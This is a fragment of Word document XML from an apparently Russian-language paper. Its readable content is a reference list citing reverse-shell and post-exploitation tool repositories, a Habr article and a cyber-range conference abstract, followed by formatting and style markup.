      </w:pPr>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Что Такое Обратный Шелл? /  [Электронный ресурс] // Xygeni : [сайт]. — URL: https://xygeni.io/ru/sscs-glossary/what-is-reverse-shell/ (дата обращения: 11.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCDD764" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="00E852AE" w:rsidP="00E852AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>hoaxshell /  [Электронный ресурс] // GitHub : [сайт]. — URL: https://github.com/t3l3machus/hoaxshell (дата обращения: 1</w:t>
      </w:r>
      <w:r w:rsidR="00BA4DE4">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CCFDAE" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="00E852AE" w:rsidP="00E852AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Nim Reverse Shell /  [Электронный ресурс] // GitHub : [сайт]. — URL: https://github.com/Sn1r/Nim-Reverse-Shell (дата обращения: 1</w:t>
      </w:r>
      <w:r w:rsidR="00BA4DE4">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC50F0">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2CDAD9" w14:textId="77777777" w:rsidR="00E852AE" w:rsidRDefault="00E852AE" w:rsidP="00E852AE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E852AE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ScareCrow /  [Электронный ресурс] // GitHub : [сайт]. — URL: https://github.com/Tylous/ScareCrow (дата обращения: 1</w:t>
      </w:r>
      <w:r w:rsidR="00BA4DE4">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E852AE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD47A1E" w14:textId="77777777" w:rsidR="00C148FC" w:rsidRDefault="00E852AE" w:rsidP="00C148FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E852AE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>PowerShell Empire: продвинутая пост-эксплуатация Windows систем /  [Электронный ресурс] // Habr : [сайт]. — URL: https://habr.com/ru/articles/351592/ (дата обращения: 1</w:t>
      </w:r>
      <w:r w:rsidR="00BA4DE4">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E852AE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.04.2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DAF15" w14:textId="77777777" w:rsidR="005A3041" w:rsidRPr="005A3041" w:rsidRDefault="005A3041" w:rsidP="005A3041">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0330B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Уймин, А. Г. Нормирование показателей при организации Киберполигона по сетевым технологиям / А. Г. Уймин // Нефть и газ - 2024 : Тезисы докладов 78-ой Международной молодежной научной конференции, Москва, 22–26 апреля 2024 года. – Москва: Российский государственный университет нефти и газа (национальный исследовательский университет) имени И.М. Губкина, 2024. – С. 1253-1254. – EDN EPVPRC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005A3041" w:rsidRPr="005A30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C1262"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7916E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DB10AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DB8B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E2932"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EC24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78A2F88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC465ACE"/>
    <w:lvl w:ilvl="0" w:tplc="507AF25E">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B456A18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D542D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E05646"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E8E6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54F6E98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C00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7F3EA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4D2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1F733F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20D60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3F4FA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="213424E4"/>
    <w:lvl w:ilvl="0" w:tplc="04190001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="791" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190003" w:tentative="1">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num w:numId="1" w16cid:durableId="1212034843">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="220529107">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1495485790">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1015889555">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="133568722">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="914244229">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="585917589">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="505704257">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1631400289">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="260066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B12"/>
    <w:rsid w:val="00024DCA"/>
    <w:rsid w:val="0011236C"/>
    <w:rsid w:val="00147EC7"/>
    <w:rsid w:val="001615DE"/>
    <w:rsid w:val="001D076D"/>
    <w:rsid w:val="002A161B"/>
    <w:rsid w:val="002E6B33"/>
    <w:rsid w:val="002F4B17"/>
    <w:rsid w:val="002F4BE1"/>
    <w:rsid w:val="00306B56"/>
    <w:rsid w:val="003C062F"/>
    <w:rsid w:val="003E2D07"/>
    <w:rsid w:val="00404924"/>
    <w:rsid w:val="004215AA"/>
    <w:rsid w:val="00442644"/>
    <w:rsid w:val="004A292C"/>
    <w:rsid w:val="004A515A"/>
    <w:rsid w:val="005274F7"/>
    <w:rsid w:val="00583F4C"/>
    <w:rsid w:val="005A3041"/>
    <w:rsid w:val="005B6AB9"/>
    <w:rsid w:val="005E3BA7"/>
    <w:rsid w:val="006647F8"/>
    <w:rsid w:val="00686DA9"/>
    <w:rsid w:val="006B01EF"/>
    <w:rsid w:val="00715B33"/>
    <w:rsid w:val="007633F6"/>
    <w:rsid w:val="00777414"/>
    <w:rsid w:val="007B3B12"/>
    <w:rsid w:val="0080039F"/>
    <w:rsid w:val="00810532"/>
    <w:rsid w:val="0087676D"/>
    <w:rsid w:val="008D0837"/>
    <w:rsid w:val="009B1A98"/>
    <w:rsid w:val="009C6BEA"/>
    <w:rsid w:val="009E5AE3"/>
    <w:rsid w:val="009E7151"/>
    <w:rsid w:val="00A1503B"/>
    <w:rsid w:val="00A72FF4"/>
    <w:rsid w:val="00AD0E9A"/>
    <w:rsid w:val="00AE3AB6"/>
    <w:rsid w:val="00B003AF"/>
    <w:rsid w:val="00B66578"/>
    <w:rsid w:val="00B9711F"/>
    <w:rsid w:val="00BA4DE4"/>
    <w:rsid w:val="00BE00F9"/>
    <w:rsid w:val="00C0330B"/>
    <w:rsid w:val="00C12947"/>
    <w:rsid w:val="00C148FC"/>
    <w:rsid w:val="00C20334"/>
    <w:rsid w:val="00C430A1"/>
    <w:rsid w:val="00C94873"/>
    <w:rsid w:val="00D1167E"/>
    <w:rsid w:val="00D12BFB"/>
    <w:rsid w:val="00D576F2"/>
    <w:rsid w:val="00D84BB3"/>
    <w:rsid w:val="00DA0867"/>
    <w:rsid w:val="00E41638"/>
    <w:rsid w:val="00E44D6F"/>
    <w:rsid w:val="00E7358E"/>
    <w:rsid w:val="00E852AE"/>
    <w:rsid w:val="00E868D6"/>
    <w:rsid w:val="00EA21F2"/>
    <w:rsid w:val="00EE7CFF"/>
    <w:rsid w:val="00F141E1"/>
    <w:rsid w:val="00F167C7"/>
    <w:rsid w:val="00F56F7A"/>
    <w:rsid w:val="00FA3327"/>
    <w:rsid w:val="00FA4198"/>
    <w:rsid w:val="00FC5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CAF87"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{02A31CFB-5461-834E-9294-60F959E5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8D6"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001D076D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>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Document Base"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="009C6BEA"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="ru-RU"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001D076D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F167C7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE3AB6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE3AB6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004A292C"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00421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3986">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="28916711">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="103550055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6929456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="91367069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1072972702">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="225"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="416175221">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="225"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="728305253">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="225"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="130307885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1846986">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="103112783">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="171996115">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="192888212">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="193009314">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="202715444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="90977087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9802516">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="302546624">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1709799299">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="225"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="201827104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76784620">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="401561028">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="437483275">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="462191549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509756906">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="529026081">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="538591992">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="607935583">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="608436259">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="634331923">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="777020214">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="132365776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80609931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="852454245">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
